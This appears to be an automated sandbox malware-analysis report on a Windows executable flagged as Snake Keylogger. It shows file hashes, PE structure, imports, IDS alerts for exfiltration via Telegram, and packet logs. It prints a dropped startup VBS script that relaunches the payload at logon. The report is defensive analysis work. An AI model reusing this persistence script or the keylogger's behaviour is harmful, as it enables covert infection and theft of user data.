Preview:	...ESTRN3TLT..91.72MDS6R.FHJWHEPTRN7TLT2691H72MDS6RKFHJWHEPT.N7TBK.89.A...E..s..!9w87?3 /Zt/5\XVEhUWm6&Xr"(h...e=;6+.YA^.691H72M..6R.GKJ.r0.TRN7TLT2.93I<3.DSRSKF@JWHEPT\.6TLt269.I72M.S6rKFHHWHAPTRN7TLP2691H72M.R6RIFHJWHERT..7T\T2&91H7"MDC6RKFHJGHEPTRN7TLT2..0H\|2MDS.SK.MJWHEPTRN7TLT2691H72.ES:RKFHJWHEPTRN7TLT2691H72MDS6RKFHJWHEPTRN7TLT2691H72MDs6RCFHJWHEPTRN7\lT2~91H72MDS6RKh<//<EPTF,6TLt269UI72ODS6RKFHJWHEPTRn7T,z@EKRH72.AS6R.GHJQHEP2SN7TLT2691H72M.S6.e4-&8+EPXRN7T.U26;1H7^LDS6RKFHJWHEPT.N7.LT2691H72MDS6RKF..VHEPTR.7TLV239).72..S6QKFH.WHC0.RN.TLT2691H72MDS6RKFHJWHEPTRN7TLT2691H72MDS6RK.5.X...=!..TLT2690J46KL[6RKFHJWH;PTR.7TL.269.H72hDS6?KFHnWHE.TRNITLTV691:72M%S6R.FHJ8HEP:RN7LT2(;.W72Gnu6PcfHJ]Ho.'sN7^.U26=Bj72G.Q6RO5kJWB.STRJDpLT8.=1H3AhDS<.NFHN}.ES.DH7TW;.69;H4.XBS6Ia`HH.qEP^Rd.TO.'091S..MF.?RKBb.$UEPRz.7TF ;693.=2M@y(Pc.HJ]bg.GRN3.L~.H-1H3.MnqHGKFLaWbg.BRN3.L~.H.1H3.MnU.0K4.FW8F?5RN1\|.T2<.qH74Mni6,EFHNU'.PTXh..L\|x697H.dMDU6z.FHLW`.PTTN..LT46..H.bMDU6z.FHLWb.PaN7P`SL.91L.$3uS6V.@0J

C:\Users\user\AppData\Local\done\lustring.exe

Download File

Process:	C:\Users\user\Desktop\eLo1khn7DQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1078272
Entropy (8bit):	6.838109138223244
Encrypted:	false
SSDEEP:	24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8aCqmhb:rTvC/MTQYxsWR7aCqm
MD5:	306ABB19056FCD6A9524D361B1BFF4F5
SHA1:	54360DC5E0DA356496945E5E7A69F7481AE3A6BB
SHA-256:	007C44293C94AAAD7AF63741F5E50EA655D09F680116856393BD58487F3784E2
SHA-512:	CEC638893B225D5C7ECC85039941844ED2C4E96BAEBB8287B683F3E6F8249F14BEF8EC756390C34B3A12C198CE57F6D02A519D7B0EE69EB4F024B2A762BE18B7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 53%, Browse
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....bg..........".................w.............@......................................@...@.......@.....................d...\|....@..,....................P...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...,....@......................@..@.reloc...u...P...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Download File

Process:	C:\Users\user\AppData\Local\done\lustring.exe
File Type:	data
Category:	dropped
Size (bytes):	266
Entropy (8bit):	3.4078439957823274
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloFQlr1UEZ+lX1GlRSdnriIM8lfQVn:DsO+vNlfx1Q1GeFmA2n
MD5:	E08232005321E2759C1D60787E87487F
SHA1:	6ABECA5237F3D23B69F3E10E50D3A901E0895653
SHA-256:	990F3C1437916A79AB310BCF80FDFA357AF169187F611448786676DBAF535E67
SHA-512:	84D8DFC878BBE65440735363299636AA5E5994876201260E63B44FD37F557B88D1D435A8E387F67F66AADF2CB61CC961D197DEA7980F29995EDBA01490F01596
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.o.n.e.\.l.u.s.t.r.i.n.g...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.838109138223244
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eLo1khn7DQ.exe
File size:	1'078'272 bytes
MD5:	306abb19056fcd6a9524d361b1bff4f5
SHA1:	54360dc5e0da356496945e5e7a69f7481ae3a6bb
SHA256:	007c44293c94aaad7af63741f5e50ea655d09f680116856393bd58487f3784e2
SHA512:	cec638893b225d5c7ecc85039941844ed2c4e96baebb8287b683f3e6f8249f14bef8ec756390c34b3a12c198ce57f6d02a519d7b0ee69eb4f024b2a762be18b7
SSDEEP:	24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8aCqmhb:rTvC/MTQYxsWR7aCqm
TLSH:	48358D03738D822EFF9B91326A76E221467C6F270123A51F33D85D7DB9701A5163E6E2
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	24ed8d96b2ade832

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6762B4DC [Wed Dec 18 11:41:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FF598EF59B3h
jmp 00007FF598EF52BFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF598EF549Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF598EF546Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FF598EF805Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FF598EF80A8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FF598EF8091h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3082c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x105000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3082c	0x30a00	20344b5312220ee517c8485395121b0f	False	0.7094814428020566	data	7.274350629350973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x105000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd4458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd4580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd46a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd47d0	0xd228	Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m	English	Great Britain	0.07864312267657993
RT_MENU	0xe19f8	0x50	data	English	Great Britain	0.9
RT_STRING	0xe1a48	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xe1fdc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xe2668	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xe2af8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xe30f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe3750	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe3bb8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe3d10	0x205fd	data			1.0003846008823196
RT_GROUP_ICON	0x104310	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x104324	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x104338	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x10434c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x104360	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10443c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:38:00.731174+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49712	132.226.247.73	80	TCP
2025-01-10T18:38:07.246556+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49712	132.226.247.73	80	TCP
2025-01-10T18:38:07.967704+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.12	49714	149.154.167.220	443	TCP
2025-01-10T18:38:08.333262+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.12	49714	149.154.167.220	443	TCP
2025-01-10T18:38:14.340281+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49720	132.226.247.73	80	TCP
2025-01-10T18:38:20.355973+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49720	132.226.247.73	80	TCP
2025-01-10T18:38:20.979750+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.12	49722	149.154.167.220	443	TCP
2025-01-10T18:38:21.385613+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.12	49722	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:37:59.780391932 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:37:59.785240889 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:37:59.785455942 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:37:59.785799980 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:37:59.790575981 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:00.470386982 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:00.474669933 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:00.479499102 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:00.685806036 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:00.731173992 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:00.783967018 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:00.784008980 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:00.784113884 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:00.834112883 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:00.834132910 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.438136101 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.438281059 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:01.456337929 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:01.456366062 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.456772089 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.497881889 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:01.550304890 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:01.591337919 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.664717913 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.664784908 CET	443	49713	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:01.664870977 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:01.688971996 CET	49713	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:06.982342005 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:06.987271070 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:07.194361925 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:07.206245899 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.206293106 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.206360102 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.207043886 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.207072020 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.246556044 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:07.852701902 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.852874041 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.923846006 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.923919916 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.924859047 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.926450968 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.967338085 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:07.967576981 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:07.967588902 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:08.333324909 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:08.333422899 CET	443	49714	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:08.333468914 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:08.334187031 CET	49714	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:13.305455923 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:13.310364008 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:13.310497046 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:13.310791969 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:13.315617085 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:13.985285044 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:14.027870893 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:14.077166080 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:14.082217932 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:14.287674904 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:14.330795050 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.330848932 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:14.330943108 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.335366011 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.335380077 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:14.340281010 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:14.838018894 CET	443	49721	104.21.64.1	192.168.2.12
